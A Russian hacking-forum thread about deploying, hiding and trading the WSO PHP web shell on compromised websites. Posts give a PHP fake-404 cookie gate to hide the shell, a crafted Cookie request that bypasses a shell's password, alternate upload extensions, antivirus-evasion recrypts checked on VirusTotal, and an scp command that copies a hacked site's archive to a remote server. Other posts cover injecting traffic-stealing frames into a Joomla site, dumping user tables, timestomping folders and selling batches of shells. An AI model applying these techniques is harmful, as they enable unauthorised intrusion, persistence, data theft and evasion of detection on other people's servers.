не могу понять твоей мысли:





плюс чтоб потом не мучиться переправкой кода, можно добавить функцию обновления шелла с какого нить источника...

условие такое: шелл править нет возможности.

ты не о том...

разобрал уже:

постом отправлям сперва (шеллу):

pass=password

потом:

a=php&p1=echo(11);

в рузультате echo(11); выполняется на стороне сервера.

думаю, это будет полезно прикрутить к ману шелла.

Что тебе мешает написать небольшой скрипт, который будет логиниться в шелл и eval'ить твой код на стороне сервера?

UPD: да что там даже логиниться - алгоритм генерации кукисов-то известен, пароль к шеллу ты сам задаешь.

Присутствует ли возможность редактирования базы данных?

Присутствует ли возможность редактирования базы данных?


Да. Можно выполнить любой запрос к БД.

Присутствует ли возможность редактирования базы данных?


MySQL, PgSQL.

Ещё было бы не плохо сделать при создании архива,указывать путь где сохранить.

А то я например залил шелл,а заархивировать ничего не получается потому что в var/www/ каталоге права "Только чтение".

А так бы можно было создать архив в каталоге var/tmp/

Насколько надежна филтрация поисковиков? Имеются в виду не только яндекс и гугл, но и совсем малоизвестные иностранные.

Насколько надежна филтрация поисковиков? Имеются в виду не только яндекс и гугл, но и совсем малоизвестные иностранные.


Относительно ненадежна.

"Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"

Однако можешь зделать требование, когда будет открываться шелл, а при обычном GET он выдадет 404.

Относительно ненадежна.
"Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"
Однако можешь зделать требование, когда будет открываться шелл, а при обычном GET он выдадет 404.


Если б еще написали как это сделать, было бы замечательно!

Думаю многим бы пригодилась бы, данная модификация..

Если б еще написали как это сделать, было бы замечательно!
Думаю многим бы пригодилась бы, данная модификация..






404 Not Found

Not Found

The requested URL was not found on this se rver.

";

}

?>

Далее чтоб открыть шелл открывай по адресу /shell.php?key=antichat

404 Not Found

Not Found

The requested URL was not found on this se rver.

";

}

?>

Далее чтоб открыть шелл открывай по адресу /shell.php?key=antichat


О боже... Такое чудо ни от поисковиков не спасёт, а только админов привлечёт.

Нужен код 404 в HTTP заголовках, если его нет, шелл проиндексируют в е зависимости от контента. А GET вызовет лишнее палево в логах.

Лучше использовать что то подобное:


//В начало кода

if(!isset($_COOKIE['ts'])) {

header('HTTP/1.0 404 Not Found');

exit;

}

У меня одного доступ по паролю не работает? Ввожу пароль - ничего не происходит.

У меня одного доступ по паролю не работает? Ввожу пароль - ничего не происходит.


Значить пароль не верный.

miracles, а ты пароль в мд5 вписывал?

Значить пароль не верный.


Нет. у меня тоже самое никакой реакции... тоже самое как буд то конекта нету что ли

Нет. у меня тоже самое никакой реакции... тоже самое как буд то конекта нету что ли


значит папка для сессий недоступна для записи. Попробуй убрать пасс и проверить это.

значит папка для сессий недоступна для записи. Попробуй убрать пасс и проверить это.


Особенно если учесть что WSO не использует сессии

Особенно если учесть что WSO не использует сессии


да ну? Сейчас глянул версию 2 и 2.1 - использует. Может в новых версиях переписали код для работы без сессий?

P.S. Ага, переписали в 2.5.

что из софта актуально под брут пароля?

не подскажите в чем проблема -

меняешь права на файл или папку, права не ставятся

выставляются какие-то левые и потом пытаешься изменить и не получается...

не подскажите в чем проблема -
меняешь права на файл или папку, права не ставятся
выставляются какие-то левые и потом пытаешься изменить и не получается...


1. Значит не хватает прав для правки файлов

2. Твой шел принадлежит не той групе к которой принадлежит файл

3. файлы должны правиться в папке с правами 777 естествено одной группы с шелом


что из софта актуально под брут пароля?


Ты про брут шела?, тот же AESBrut

как сделать чтоб шелл норм держал араский язык?...оч надо а допетрить не могу

Винда и браузер под локализацию эту сделаны,а в шеле все равно не отображает норм язык а сплошные кракозябры(

как сделать чтоб шелл норм держал араский язык?...оч надо а допетрить не могу
Винда и браузер под локализацию эту сделаны,а в шеле все равно не отображает норм язык а сплошные кракозябры(


в браузере выстави кодировку.

не помогает...яж написал что и браузер и винда настроена под локализацию арабскую

как сделать чтоб шелл норм держал араский язык?...оч надо а допетрить не могу
Винда и браузер под локализацию эту сделаны,а в шеле все равно не отображает норм язык а сплошные кракозябры(


Смотри в какой кодировке имена файлов, м.б. они в юникоде, да и арабские кодировки разные есть.

не помогает...яж написал что и браузер и винда настроена под локализацию арабскую



Настроены, но наверное, не выбраны. Ты точно выбираешь в настройках браузера ее?

вид->кодировка->арабская или юникод (смотришь соурс морды сайта или заголовки смотришь какая конкретно кодировка используется и выбираешь ее).

Нужно сохранить полностью все папки сайта.

Пробую зиповать - ничего не происходит.

На сервере включено gzip, zip и т.д.

В чём дело, как исправить?

Нужно сохранить полностью все папки сайта.
Пробую зиповать - ничего не происходит.
На сервере включено gzip, zip и т.д.
В чём дело, как исправить?


Смотри, есть ли на папке права на запись.

Да, всё есть

Да, всё есть


Тогда будет легче и эффективнее воспользоваться консолью

у всех или тока у меня проблема с отображение русского языка? везде стоит windows-1251 как и в браузере так и на шелле)

Отличный шелл, андетектед, да ещё и функционал широкий. Вот только жаль, что с виндой многие функции пахать не предусмотрены... Ещё бы поддержку MSSQL...

вопрос эт какие ж функции не пашут с windows? стоиту меня windows xp поверхостно посмотрел вроде все работает только проблема с отображением русского языка.) шелл действительно отличный. о только что нашеЛ) кажись на windows нельзя скопировать папку или закинуть в зип архив и скопировать папку) вообще нечего немогу с папкой сделать даже скопировать 1 папку в другой каталог)

Собственно, я о этом и говорю... PATCH . Конечно, можно через консоль, но сам факт...

на linux и ubunity работает?)

на linux и ubunity работает?)



Работает, работает .

Ещё бы поддержку MSSQL...


Жаль что с базой туго...

не работает архиватор, приходится пользоваться консолью

не работает архиватор, приходится пользоваться консолью


Под линей пахает... Под виндой - нет.

Под линей пахает... Под виндой - нет.


типа под виндой вообще архиватор не пашет?

типа под виндой вообще архиватор не пашет?


Всё прекрасно работает, не обращайте внимание на дураков, или на тех, у кого руки из ж*пы растут

Всё прекрасно работает, не обращайте внимание на дураков, или на тех, у кого руки из ж*пы растут


или на тех, кто не понимает о чём пишет, да ?

давно известно что на всо только линуксувую консоль архиватор аля unzip пашет

я наверно дуб, но не понимаю, куда он сохраняет после архивирования файлы? Нажимаю компресс(зип), выбираю имя файла, подтверждаю, а куда он сохраняется, непонятно

после компрессии надо потом выбрать paste

Шелл отличный

Но почему я не могу пройти идентификацию?(( Вроде ставлю пароль "3",сохраняю и загружаю на сервер. Загружаю страничку входа, ввожу пароль, а он не вводиться

Шелл отличный
Но почему я не могу пройти идентификацию?(( Вроде ставлю пароль "3",сохраняю и загружаю на сервер. Загружаю страничку входа, ввожу пароль, а он не вводиться


а ты в md5() пасс вставил?

нет а теперь я понял спасибо)


а ты в md5() пасс вставил?

Парни подскажите как с помощью WSO из бд сделать ДАмп определенных полей. и мвозможно ли это сделать?

после подключения к бд внизу будет консоль бд, через нее не пробовал?

Подскажите как сделать дамп?

выбираю колонку users(280к)

жму Dump и через 2 минуты получаю страницу с ошибкой

потался подключится через FileZilla но ничего не получилось

Подскажите как сделать дамп?
выбираю колонку users(280к)
жму Dump и через 2 минуты получаю страницу с ошибкой
потался подключится через FileZilla но ничего не получилось


попробуй дедовским способом через консоль


mysqldump -uLOGIN -PPORT -hHOST -pPASS DBNAME > dump.txt

если конечно хватит прав

Error! Can't open file

тут такой еще вопрос. Заливаю шелл, но при обращении к нему вываливается страница с сорцами вперемешку с формами и вылазит сообщение "Error! Can't open file". Понимаю, что вопрос не связан с самим шеллом, а что то с настройками сервера, но может кто то подскажет в чем дело?

тут такой еще вопрос. Заливаю шелл, но при обращении к нему вываливается страница с сорцами вперемешку с формами и вылазит сообщение "Error! Can't open file". Понимаю, что вопрос не связан с самим шеллом, а что то с настройками сервера, но может кто то подскажет в чем дело?


Залей шелл с другим расширением


.php3
.php4
.php5
.phtml

Чего нить да пройдёт...

тут такой еще вопрос. Заливаю шелл, но при обращении к нему вываливается страница с сорцами вперемешку с формами и вылазит сообщение "Error! Can't open file". Понимаю, что вопрос не связан с самим шеллом, а что то с настройками сервера, но может кто то подскажет в чем дело?


Ты наверно код оставил без

тут такой еще вопрос. Заливаю шелл, но при обращении к нему вываливается страница с сорцами вперемешку с формами и вылазит сообщение "Error! Can't open file". Понимаю, что вопрос не связан с самим шеллом, а что то с настройками сервера, но может кто то подскажет в чем дело?


Возможно, для данной директории стоит запрет на выполнение PHP-скриптов.

[QUOTE="Ereee"]
Ты наверно код оставил без

Человеки добрые, подскажите в чём дело:

На ломе прекрасно открывается данный шел из этой темы ( /showthread.php?p=2952163 ), только не работают Actions.

Но не открывается вообще шел без модификации ( т.е. который располагается по ссылкам ТСа ) пишет про ошибку:

"Parse error: syntax error, unexpected ')', expecting '(' in лом/wso2.php on line 595

Качаю прямо из топика автора, переименовываю, исправляю хеш пароля, заливаю на лом. Больше никаких исправлений не делаю

Человеки добрые, подскажите в чём дело:
На ломе прекрасно открывается данный шел из этой темы ( /showthread.php?p=2952163 ), только не работают Actions.
Но не открывается вообще шел без модификации ( т.е. который располагается по ссылкам ТСа ) пишет про ошибку:
"Parse error: syntax error, unexpected ')', expecting '(' in лом/wso2.php on line 595
Качаю прямо из топика автора, переименовываю, исправляю хеш пароля, заливаю на лом. Больше никаких исправлений не делаю


Либо попробую wso2_pack.php либо r57.php

Проблема давно известная, других вариантов пока я не встречал

Интересует следующий момент: пакованный шел выглядит так..


настройки

preg_replace("/.*/e"," тут пошел код

....

",".");

А если паковать билдером, то код выглядит так..


$o=" тут пошел код

...

";eval(" код ");

Как паковать шелл первым способом (т.е. чтобы не было eval'a)?

скажите плз, что такое, залил шелл, нормально, заходить пытаюсь, ни ошибок ничего нет, просто пустая страница, графы для пароля нет, на других сайтах заливал все норм, в чем может быть дело?

возможно .htaccess мешает

возможно .htaccess мешает


а проверить как то можно? и если нет доступа до папки с .htaccess, то вариков запустить шелл нет?

у меня вообще кодировка не сходится

OS Version: Microsoft Windows [Version 6.1.7601]

Account Settings:

ЏаЁ*㤨⥫м*л© ўл室 Ї® ЁбвҐзҐ*ЁЁ ўаҐ¬Ґ*Ё зҐаҐ§: ЌЁЄ®Ј¤

ЊЁ*Ё¬ «м*л© ба®Є ¤Ґ©бвўЁп Ї а®«п (¤*Ґ©): 0

Њ ЄбЁ¬ «м*л© ба®Є ¤Ґ©бвўЁп Ї а®«п (¤*Ґ©): 42

ЊЁ*Ё¬ «м* п ¤«Ё* Ї а®«п: 0

•а *Ґ*ЁҐ *ҐЇ®ўв®апойЁебп Ї а®«Ґ©: ЌҐв

Ѓ«®ЄЁа®ўЄ Ї®б«Ґ ®иЁЎ®Є ўў®¤ Ї а®«п: ЌЁЄ®Ј¤

„«ЁвҐ«м*®бвм Ў«®ЄЁа®ўЄЁ (¬Ё*гв): 30

‘Ўа®б бзҐвзЁЄ Ў«®ЄЁа®ў®Є зҐаҐ§ (¬Ё*гв): 30

ђ®«м Є®¬ЇмовҐа : ђЂЃЋ—Ђџ ‘’ЂЌ–€џ

Љ®¬ *¤ ўлЇ®«*Ґ* гбЇҐи*®.

User Accounts:

“зҐв*лҐ § ЇЁбЁ Ї®«м§®ў ⥫Ґ© ¤«п \\NOUT_1

-------------------------------------------------------------------------------

Alex Ђ¤¬Ё*Ёбва в®а ѓ®бвм

Љ®¬ *¤ ўлЇ®«*Ґ* гбЇҐи*®.

Посмотрел код шелла , там только одна функция php preg_replace() (поиск и замена).

и в ней все шифрованно, хотелось бы знать как это все работает и в каком формате зашифрованно.

уже много раз обсуждалось

пакер:

https://rdot.org/forum/showpost.php?p=12378&postcount=17

незапакованная версия шелла:

https://rdot.org/forum/showpost.php?p=11829&postcount=1

Посмотрел код шелла , там только одна функция php preg_replace() (поиск и замена).
и в ней все шифрованно, хотелось бы знать как это все работает и в каком формате зашифрованно.


кто мешает расшифровать ?

WSOmanager - может заливать файлы через список шелов?

залейте ктонить куда без Бекдора

спасибо

если в настройках php disable function отключен disk_free_space, то шелл не закачивает файлы на сервер (при том что есть все права)

не знаю куда напсиать, надеюсь сдесь поможете.

У меня на сайте есть Wso шелл, сайт на Джумле. Нужно на этот сайт вставить php код для слития трафика. Вообщем нужно вставить код в такой файл, который вызывается на всех страницах Сайта. Вот как выглядит папка сайта:

http://screenshotuploader.com/s/01/fkDTIVlBK

в index.php вставляю - не получается.

Вот как выглядит index.php:

http://screenshotuploader.com/s/01/7HPMox3A

Да и вообще, при залитии в главную дирикторю(или даже в любую) и при обращении к файлу: site.ru/file.html например, не отображается, а отображается просто главная страница. Куда и как вписать мой код?

Листая тему понял то, что ничего не понимаю в плане того, где без ошибок, а где с ошибками. И делается ли тут модификачия или каждый хвалится тем, что написал?

Если это общие труды, прошу поделиться кодом.

У меня на сайте есть Wso шелл, сайт на Джумле. Нужно на этот сайт вставить php код для слития трафика. Вообщем нужно вставить код в такой файл, который вызывается на всех страницах


Ставь фрейм в индексе на свой файл.

не знаю куда напсиать, надеюсь сдесь поможете.
У меня на сайте есть Wso шелл, сайт на Джумле. Нужно на этот сайт вставить php код для слития трафика. Вообщем нужно....


Открываешь свой сайт через браузер, потом исходный код, смотришь где располагается тема(templates) идешь туда и с ставишь фрейм либо инклуд.

залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable

права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?

тебе прав не достаточно.вроде..

залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?


залей туда свой htaccess

залей туда свой htaccess


...если есть права на заливку в корень, конечно.

залил шеллы, много серваков, за день захожу - на всех пишет No send, тупо белое окно, без авторизации, и пишет No send.

Что это? как вернуть шеллы если уязвимости на сайте уже нет, а шеллы доступны, но такая вот хрень..?

залил шеллы, много серваков, за день захожу - на всех пишет No send, тупо белое окно, без авторизации, и пишет No send.
Что это? как вернуть шеллы если уязвимости на сайте уже нет, а шеллы доступны, но такая вот хрень..?


Прошерстили логи, закрыли баги, нашли шелл, закрыли тебе доступ.Все Соседние сайты ковыряй.

Прошерстили логи, закрыли баги, нашли шелл, закрыли тебе доступ.Все
Соседние сайты ковыряй.


на всех серверах? и не потёрли? не возможно такое, тут дело в wso, только не пойму что именно случилось...

залил шеллы, много серваков, за день захожу - на всех пишет No send, тупо белое окно, без авторизации, и пишет No send.
Что это? как вернуть шеллы если уязвимости на сайте уже нет, а шеллы доступны, но такая вот хрень..?


удалили файл, или просто не ту папку смотришь куда заливал, проверь еще сайты сами робят

Del msg

у меня nod палит этот шелл, чем закодировать чтобы не палил?

Сейчас вообще актуальная версия 2.5? Нет более новых и поддерживаемых шеллов wso?


На каком-то бурж хак форумах видел WSO 2.6. Попросил мне скинуть, так и не скинули. На вид то же самое, что и WSO 2.5

UPD: А вот сам и сайт (http://www.hackforums.net/showthread.php?tid=2336179&highlight=WSO)

сайт на Forbidden

сайт на Forbidden


1) мб надо зарегатся

2) с опр. IP туда не пускают...

На каком-то бурж хак форумах видел WSO 2.6. Попросил мне скинуть, так и не скинули. На вид то же самое, что и WSO 2.5
UPD:
А вот сам и сайт (http://www.hackforums.net/showthread.php?tid=2336179&highlight=WSO)


Последняя версия лежит в привате и видеть ее вы никак не могли. А то, что у них там либо фейк или ихние наработки!

1) мб надо зарегатся
2) с опр. IP туда не пускают...


с каких именно определённых ип туда не пускают?я уже 1 год не могу зайти туда

Последняя версия лежит в привате и видеть ее вы никак не могли. А то, что у них там либо фейк или ихние наработки!


Я видел на скрине... Адрес по которому лежит шелл выходит якобы ошибка 404. А на самом деле за надписью есть поле ввода пароля...


с каких именно определённых ип туда не пускают?я уже 1 год не могу зайти туда


К сожалению, я не знаю с каких IP. Воспользуйтесь VPN (западные страны)

Последняя версия лежит в привате


Откуда информация ? Кто нибудь ещё может подтвердить её достоверность ? В чём заключается апдейт ?

Откуда информация ? Кто нибудь ещё может подтвердить её достоверность ? В чём заключается апдейт ?


Про приват не слышал. Есть доработанный шелл группой лиц, которые присвоили ему название WSO 2.6

Откуда информация ? Кто нибудь ещё может подтвердить её достоверность ? В чём заключается апдейт ?


На то он и приват, что бы вы о нем не слышали, что за глупые вопросы.

На то он и приват, что бы вы о нем не слышали, что за глупые вопросы.


А ну тогда да, есть скрипт ломающий любой GOV или MIL сайт и заливающий шелл в 2 клика, только о нём никому не известно, даже создателям, потому что он приват.

Как то так звучит твоё объяснение....

З.Ы. Сарказм насколько вы поняли =/

с каких именно определённых ип туда не пускают?я уже 1 год не могу зайти туда


С РУ ip не пускает, лучше всего под US соксами туда.

куда то блять вас всех не пускает? надеюсь и не пустит.

дорогой орб, если майнтейнишь данный скрипт, заделай баг в паблик версии->mysql клиент. Щелл плохо работает с таблицами которые содержат пробелы в имени. Проблема в каунтах.

Некий WSO 2.6 кому сильно надо.

http://pastebin.com/Xneg3zJu

как менять права в папках через шел этот?

Щелл плохо работает с таблицами которые содержат пробелы в имени.


Разве пробелы в именах разрешены?


Некий WSO 2.6 кому сильно надо.


2.6 нету есть 2.5.1

Какой пароль стоит по умолчанию для входа или, где его ставить?

Какой пароль стоит по умолчанию для входа или, где его ставить?


Для получения пароля, отправь СМС на короткий номер 9535 с текстом, "WSO 2.5" в ответ получишь пароль

Какой пароль стоит по умолчанию для входа или, где его ставить?


Открой исходник, там всё есть

или задай сам, с нужными опциями

http://kronus.me/cn/wso-builder/1.04/

Какой пароль стоит по умолчанию для входа или, где его ставить?


root

как его научить работать с suid файлами?

как его научить работать с suid файлами?


Используя вот это (https://antichat.live/threads/287507/)

WSO 2.5 modif - выдает ошибку "Query did not return anything"

что в строке PHP указать? я вроде указываю путь из php.ini - но все равно, если ввести 2 поля верхних то он показывает что есть рут, поле 3 ввожу, и все ошибка.

Думаю что то связано с PHP Интерпретатором, wrapper.php в связке с wso_root.php, перестали работать, можете помочь?)

WSO 2.5 modif - выдает ошибку "Query did not return anything"
что в строке PHP указать? я вроде указываю путь из php.ini - но все равно, если ввести 2 поля верхних то он показывает что есть рут, поле 3 ввожу, и все ошибка.
Думаю что то связано с PHP Интерпретатором, wrapper.php в связке с wso_root.php, перестали работать, можете помочь?)


напиши в личку,может помогу

Некий WSO 2.6 кому сильно надо.
http://pastebin.com/Xneg3zJu


А чего нет в 2.5 ? Зачем вообще обновление?

Не то, что бы это дикий пиздец, но если вдруг, вы забыли пароль к своему шеллу WSO, и у вас есть возможность прочитать исходник, можно увидеть вполне элементарную строчку:


$auth_pass="5deeb7c8589e337d46a3b2f807af33fd";# md5(пароль)

Но к сожалению если ваша память коротка, а cmd5 и подобные сервисы не в силах сбрутить пароль по типу "md5(FmST[3XjPW) = 5deeb7c8589e337d46a3b2f807af33fd", а текстовый документ с исходным паролем чудом не сохранился. Расстраиваться не нужно. Достаточно послать в запросе в заголовке Cookie md5 сумму хоста, и прочитанный хеш.

К примеру, шелл тут: http://google.com/images/wso.php

Возможность прочитать исходник тут: http://google.com/index.php?file=../images/wso.php

Получаем:


$auth_pass="5deeb7c8589e337d46a3b2f807af33fd";# md5(пароль)

Посылаем запрос:


GET /images/wso.php HTTP/1.1
Host: google.com
Cookie: 1d5920f4b44b27a802bd77c4f0536f5a=5deeb7c8589e337d4 6a3b2f807af33fd

Меняем пароль, на тот который в состоянии запомнить, и всё.

Не знаю кому эта информация сможет пригодиться, но пусть полежит здесь.

У меня сделка через 4 часа..

Человек оплачивает хххх$ с протекцией, потом получает пачку шеллов залитый, потом передаёт код, а потом я передаю пароль. Вот я и думаю теперь насколько вероятно для него будет не дать мне код протекции (человек сомнительный, если честно), а просто попытаться расшифровать хэш =)

Что за фигня? При смене пароля на свой авторизоваться не хочет, ввожу правильно и уже не первый раз так

Что за фигня? При смене пароля на свой авторизоваться не хочет, ввожу правильно и уже не первый раз так


Почистите кукисы.

почистил анологично

er"]
po[w]er said:
почистил анологично


было бы неплохо еще и хеш пароля проверить

А че так и не добавили бекконнект с полноценным башем?

https://rdot.org/forum/showthread.php?t=1386

Есть возможность отследить действия через шелл или добавиться код чтоб в отдельный файл логировал все команды ,а то в последнее время частенько берут шеллы на проверку ,а потом мол "неподошел".

Есть возможность отследить действия через шелл или добавиться код чтоб в отдельный файл логировал все команды ,а то в последнее время частенько берут шеллы на проверку ,а потом мол "неподошел".


да можно, кто тебе мешает? на вопрос как? - ответ. нанимай кодеров и всё тебе сделаеют.

если что моешь моим скриптом воспользоватся, как раз для этих целей http://mh-proxy.ru/blog/index.php?mod=read&id=11

как менять права на папки через шел? массово?

как менять права на папки через шел? массово?


Клац (http://g.zeos.in/?q=Man%20chmod)

Клац (http://g.zeos.in/?q=Man%20chmod)


и что клац? не увидел я в гугле как менять права через WSO

и что клац? не увидел я в гугле как менять права через WSO


ну тогда тебе рано права менять учись гуглом пользоватсья )))

В командной строке выполни:

[QUOTE="None"]
echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{%-{

более свежей нет у кого нибудь? можно в личку

WSO 2.6 / 1.4.9 (Stealthers.in edition - Modified by Death Burner / Staf4)

сам не сделаешь, никто не сделает =( всем достаточно того что есть =(

добавил пару функций 1 клик серв нашпигован бекдорами 2ой клик уплоадерами )

чего бы ещё добавить?

никто не сталкивался с такой проблемой как скачка файлов больше 1 гигабайта? думаю конечно что дело все же не в шелле, а в настройках апача и ограничениями. подскажите что сделать в подобной ситуации?

скачивал сайты и 20 гигов через Download Master путь пропиши к архиву и всё site.ru/tmp/file.tar например

если бы это было так, то я бы не задавал подобного вопроса. мне нужны файлы из под серверного каталога, поэтому путь для скачки никак не укажешь

если бы это было так, то я бы не задавал подобного вопроса. мне нужны файлы из под серверного каталога, поэтому путь для скачки никак не укажешь


проблема раздута, есть ftp, sftp, curl в конце концов, к тому же, всегда можно разбить архив на части или банально засимулинкать в папку доступную с веба

Можно ли через консоль сменить тач у выбранных папок?

Если да, то как?

Можно ли через консоль сменить тач у выбранных папок?
Если да, то как?




touch folder1 folder2 folder3 -d "2012-01-31 17:59:30"

Дата вставляется в том же формате, в котором она показана в ВСО, обязятельно в кавычках.

Но не на всех системах работает флажок -d, например на FreeBSD он не работает. В этом случае придётся использовать флажок -t


touch folder1 folder2 folder3 -t 201201311759.30

Чтобы преобразовать дату в формат, пригодный для -t, надо убрать между числами пробелы, дефисы и двоеточия, и перед числом седунд поставить точку.

Скачал обновленный wso который со страницей 404 из шапки или из этого сообщения (https://antichat.live/showpost.php/p/3262825/postcount/323/). Но его детектит Avira сразу же, даже не запуская (PHP/Shell.G.2). Как бы сделать чтобы Avira не детектила? Да и вобще антивирусы не видели. А то мало ли на хостинге антивирусы могут быть.

Еще пару неприятных багов обнаружил:

1. Если открывать шелл через анонимайзер, и редактировать css, то все ссылки в background:url();

изменяются на длинную строку типа ./ob2tema.nn2weylofzzhk и после сохранения получаем битый css. Так можно и сайт запороть.

2. Шелл не работает на хостингах которые на Windows.

Выдает такую ошибку:


Warning: Unknown: failed to open stream: Permission denied in Unknown on line 0

Fatal error: Unknown: Failed opening required 'C:/Site/localhost/www/f.php' (include_path='.;C:\php5\pear') in Unknown on line 0

Скачал обновленный wso который со страницей 404 из шапки или из этого
сообщения (https://antichat.live/showpost.php/p/3262825/postcount/323/)
. Но его детектит Avira сразу же, даже не запуская (PHP/Shell.G.2). Как бы сделать чтобы Avira не детектила? Да и вобще антивирусы не видели. А то мало ли на хостинге антивирусы могут быть.
Еще пару неприятных багов обнаружил:
1. Если открывать шелл через анонимайзер, и редактировать css, то все ссылки в background:url();
изменяются на длинную строку типа ./ob2tema.nn2weylofzzhk и после сохранения получаем битый css. Так можно и сайт запороть.
2. Шелл не работает на хостингах которые на Windows.
Выдает такую ошибку:

Warning: Unknown: failed to open stream: Permission denied in Unknown on line 0

Fatal error: Unknown: Failed opening required 'C:/Site/localhost/www/f.php' (include_path='.;C:\php5\pear') in Unknown on line 0



Перекриптуй его. базовый код палится АВ.

подскажите плз, где можно найти код шелов WSO 3.0 + WSO 3.1 ?

подскажите плз, где можно найти код шелов WSO 3.0 + WSO 3.1 ?


Оффициально такой версии не выходило.

Чьи-то личные наработки, не более.

Перекриптуй его. базовый код палится АВ.


Есть ведь сервис крипта. Там цена от 1$ за один крипт.

Перекриптовал.

Вроде не палится (ну это тока пока , сами знаете)

В коде самого шелла ничего не менял, за основу взял wso2_pack

http://zalil.ru/34751845

Вирустотал

_https://www.virustotal.com/ru/file/3af075b869b3a3726cace5e8e21654acd3b8e1dd9166ace0c3 e8ed4185152c1c/analysis/1380672716/

3/48

ЗЫ - Автор, если не нравится - удалю.

Перекриптовал.
Вроде не палится (ну это тока пока
, сами знаете)
В коде самого шелла ничего не менял, за основу взял wso2_pack
http://zalil.ru/34751845
Вирустотал
_https://www.virustotal.com/ru/file/3af075b869b3a3726cace5e8e21654acd3b8e1dd9166ace0c3 e8ed4185152c1c/analysis/1380672716/
3/48
ЗЫ - Автор, если не нравится - удалю.


И чего вы там перекриптовали? первые строчки, давно уже участвуют в различных шелл-сканерах, сам шелл вы всеголишь перенесли в отдельную переменную, да и на заметку такие функции как base64_decode и preg_replace сегодня тоже можно частенько найти в шелл сканерах, и люди которые ручками вычищают, тоже обращают на эти функции внимание.

И чего вы там перекриптовали? первые строчки, давно уже участвуют в различных шелл-сканерах, сам шелл вы всеголишь перенесли в отдельную переменную, да и на заметку такие функции как
base64_decode
и
preg_replace
сегодня тоже можно частенько найти в шелл сканерах, и люди которые ручками вычищают, тоже обращают на эти функции внимание.


Ну дык каждому свое. попросили чтобы АВ не палило. я сделал. А что там дальше - это уже не мое дело.

Эх, ладно. Вот еще 2 рекрипта WSO 2.5

Основа та же - WSO v2.5 Packed

В коде шелла ничего не менял.

Внимание

Версия 2.1 закриптована публичным криптором, так что за отсутствие "добавок" (стучалок и проч.) в коде не ручаюсь. Хотя акула стука не увидела

Надеюсь эти понравятся уважаемому winstrool

wso2.5 recrypted v2.0 (http://zalil.ru/34763541) 64,1 КБ (65734 байт)

_https://www.virustotal.com/ru/file/06e167ffa411142bf45d9b9f07357afd2c35dc31022f88ed67 d470b11a6fcf75/analysis/1381193913/

результат тот же - 3 / 48

wso2.5 recrypted v2.1 (http://zalil.ru/34763550) 86,7 КБ (88800 байт)

_https://www.virustotal.com/ru/file/9a4a084309f51684ca86a1a5fac5a5c0951d5e82a407308ad0 9b69c6dcaca32b/analysis/1381193823/

Результат 1 / 48

на php 5.4 нету ни у кого?

на php 5.4 нету ни у кого?


Думаю наврятли кто-то будет переделывать на 5.4, тем более за free..

Тебе проще самому взять маны по 5.4 и покурить скрипт

на php 5.4 нету ни у кого?


а что именно не работает на php 5.4 ?

перезалейте, обменник несколько дней висит

Kamik, перезалей пожалуйста. шо то http://zalil.ru вообще 502

Как мне выполнить поиск определенного файла на сервере? Скажем, хочу я найти php.exe? Или же php.ini...

Как мне выполнить поиск определенного файла на сервере? Скажем, хочу я найти php.exe? Или же php.ini...


в консоле набери:

find / -type f -name php.ini

find / -type f -name php.exe

также в самой консоле есть уже небольшой набор команд, можешь в них покопаться и все будет ясно.

Спасибо, php.exe и php.ini не находит, но другие файлы - легко. Это может зависеть от прав? В чем может быть проблема?

Спасибо, php.exe и php.ini не находит, но другие файлы - легко. Это может зависеть от прав? В чем может быть проблема?


Конечно, если нет прав на чтение каталога - то там find искать не будет (если не ошибаюсь, он при поиске сообщает в какие каталоги заглянуть не смог).

Ежели хочешь обыскать ВЕСЬ комп - запускай find под root и будет тебе счастье.

Прекрасный шелл! А ни у кого нет версии для работы с MongoDB?

Прекрасный шелл! А ни у кого нет версии для работы с MongoDB?


phpMoAdmin - MongoDB GUI (http://phpmoadmin.com/)

А как, будучи сжав сайт в gz архив перекинуть его на удаленный сервер?

Пробовал так: scp folder.tar.bz2 root@SERVER_IP:/var/www

но так не получается, потому что надо еще пароль как то скормить...

А как, будучи сжав сайт в gz архив перекинуть его на удаленный сервер?
Пробовал так: scp folder.tar.bz2 root@SERVER_IP:/var/www
но так не получается, потому что надо еще пароль как то скормить...


По файл ключу: scp -i file_key folder.tar.bz2 root@SERVER_IP:/var/www

ребята подскажите что не так , залил шел, захожу

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@xxxxxx.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at xxxxxx.com Port 80

множество изменений сделал в шелле включая невскрываемое шифрование))

пробуем вскрыть)) мне кажеться почти невозможно)

скрин:

http://clck.ru/954fm

защищёный код:

http://clck.ru/954fq

Приветствую, вопрос по запросу к бд.

Нужно изменить в таблице данные, но не выходит. вот что пишу в консоли, может кто поможет?

UPDATE `таблица в которой нужно внести изменения` SET `раздел в котором находится информация`='что нужно вставить' WHERE (`раздел в котором находится информация`='что заменить')

В чем может быть ошибка? почему же не выполняется запрос

Изменить пытаюсь javascript на javascript.

Заранее благодарен за ответ.

Движок Ip.Board

P.s. так же пробывал заливать adminer , при редактировании вылазят макросы по всему сайту, может это можно как-то исправить?

Права есть?

Права есть?


Да полные права.

Когда этот запрос делаю, сообщений никаких не выходит.

Стоит изменить сообщение, вылазит либо ошибка синтаксиса и т.п. - все как должно быть.

Через adminer все правиться, но макросы вылазят. Так что думаю что лучше поправить через Wso... Но не получается.

Да полные права.
Когда этот запрос делаю, сообщений никаких не выходит.
Стоит изменить сообщение, вылазит либо ошибка синтаксиса и т.п. - все как должно быть.
Через adminer все правиться, но макросы вылазят. Так что думаю что лучше поправить через Wso... Но не получается.


Пользуйтесь обычными кавычками а не задними пример:


UPDATE table_name set column='блф-бла' where id=1

Перезалейте, ссылки умерли

Перезалейте, ссылки умерли


на рдот зайдите, там есть.

https://rdot.org/forum/showthread.php?t=1085

